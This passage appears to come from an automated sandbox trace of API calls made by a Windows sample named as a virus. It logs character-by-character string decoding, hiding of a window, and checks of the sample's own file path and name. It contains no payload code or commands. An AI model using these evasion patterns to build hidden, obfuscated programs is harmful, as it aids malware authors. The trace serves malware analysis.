CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0083.985] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0083.986] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b", lpUsedDefaultChar=0x0) returned 1 [0083.986] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a8d4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0083.986] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f", lpUsedDefaultChar=0x0) returned 1 [0083.986] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a884, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0083.987] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g", lpUsedDefaultChar=0x0) returned 1 [0083.987] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0083.987] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f", lpUsedDefaultChar=0x0) returned 1 [0083.988] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a8d4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0083.988] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!", lpUsedDefaultChar=0x0) returned 1 [0083.988] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe4a884, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0083.988] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0083.989] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0083.989] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k", lpUsedDefaultChar=0x0) returned 1 [0083.989] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe4a8d4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0083.989] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0083.990] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a884, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0083.990] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0083.991] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0083.992] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G", lpUsedDefaultChar=0x0) returned 1 [0083.992] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0083.992] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0083.992] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0083.993] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0083.993] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0083.993] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0083.994] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0083.994] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0083.994] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0083.994] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0083.995] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0083.995] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0083.995] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0083.996] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0083.996] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0083.996] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0083.997] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0083.997] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0083.997] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0083.998] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0083.998] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0083.998] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0083.999] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0083.999] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e", lpUsedDefaultChar=0x0) returned 1 [0083.999] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0083.999] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.000] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.000] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.000] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.001] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.001] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.001] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o", lpUsedDefaultChar=0x0) returned 1 [0084.002] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0084.002] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.002] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.002] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.003] VarSub (in: pvarLeft=0x28f95c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.003] VarCat (in: pvarLeft=0x28f9dc, pvarRight=0x28f9ac, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0084.003] IsWindowVisible (hWnd=0x70062) returned 0 [0084.003] ShowWindow (hWnd=0x70062, nCmdShow=0) returned 0 [0084.003] GetWindowLongA (hWnd=0x70062, nIndex=-20) returned 262400 [0084.003] SetWindowLongA (hWnd=0x70062, nIndex=-20, dwNewLong=262400) returned 262400 [0084.004] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x7c, wParam=0xffffffec, lParam=0x28f3ec) returned 0x0 [0084.004] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x7d, wParam=0xffffffec, lParam=0x28f3ec) returned 0x0 [0084.004] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0xd, wParam=0x208, lParam=0x28dd10) returned 0x0 [0084.004] IsWindowVisible (hWnd=0x70062) returned 0 [0084.004] ShowWindow (hWnd=0x70062, nCmdShow=0) returned 0 [0084.004] ShowWindow (hWnd=0x6006a, nCmdShow=0) returned 1 [0084.004] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0084.005] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x46, wParam=0x0, lParam=0x28f640) returned 0x0 [0084.005] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x47, wParam=0x0, lParam=0x28f640) returned 0x0 [0084.006] lstrcpynA (in: lpString1=0x28f454, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=260 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0084.006] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0084.006] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bcd0 [0084.006] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bd20 [0084.006] lstrcpyA (in: lpString1=0x310bcd0, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0084.019] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x27) returned 0x310bd70 [0084.019] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd20 | out: hHeap=0x30f0000) returned 1 [0084.019] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0084.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2a29d10ec3310613657d8a0dcaa4aabe.virus", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0084.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2a29d10ec3310613657d8a0dcaa4aabe.virus", cbMultiByte=-1, lpWideCharStr=0xe3fcac, cchWideChar=39 | out: lpWideCharStr="2a29d10ec3310613657d8a0dcaa4aabe.virus") returned 39 [0084.020] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd70 | out: hHeap=0x30f0000) returned 1 [0084.020] CharUpperBuffW (in: lpsz="2a29d10ec3310613657d8a0dcaa4aabe.virus", cchLength=0x27 | out: lpsz="2A29D10EC3310613657D8A0DCAA4AABE.VIRUS") returned 0x27 [0084.020] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f568, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0084.020] lstrcpynA (in: lpString1=0x28f454, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=260 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0084.020] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0084.020] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bcd0 [0084.020] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bd20 [0084.020] lstrcpyA (in: lpString1=0x310bcd0, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0084.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2a29d10ec3310613657d8a0dcaa4aabe.virus", cbMultiByte=-1, lpWideCharStr=0xe56e2c, cchWideChar=39 | out: lpWideCharStr="2a29d10ec3310613657d8a0dcaa4aabe.virus") returned 39 [0084.021] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd70 | out: hHeap=0x30f0000) returned 1 [0084.021] CharUpperBuffW (in: lpsz="2a29d10ec3310613657d8a0dcaa4aabe.virus", cchLength=0x27 | out: lpsz="2A29D10EC3310613657D8A0DCAA4AABE.VIRUS") returned 0x27 [0084.021] VarCmp (pvarLeft=0x28f8f8, pvarRight=0x28f97c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0084.021] VarCmp (pvarLeft=0x28f8c8, pvarRight=0x28f98c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0084.021] VarAnd (in: pvarLeft=0x28f8e8, pvarRight=0x28f8b8, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0084.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", 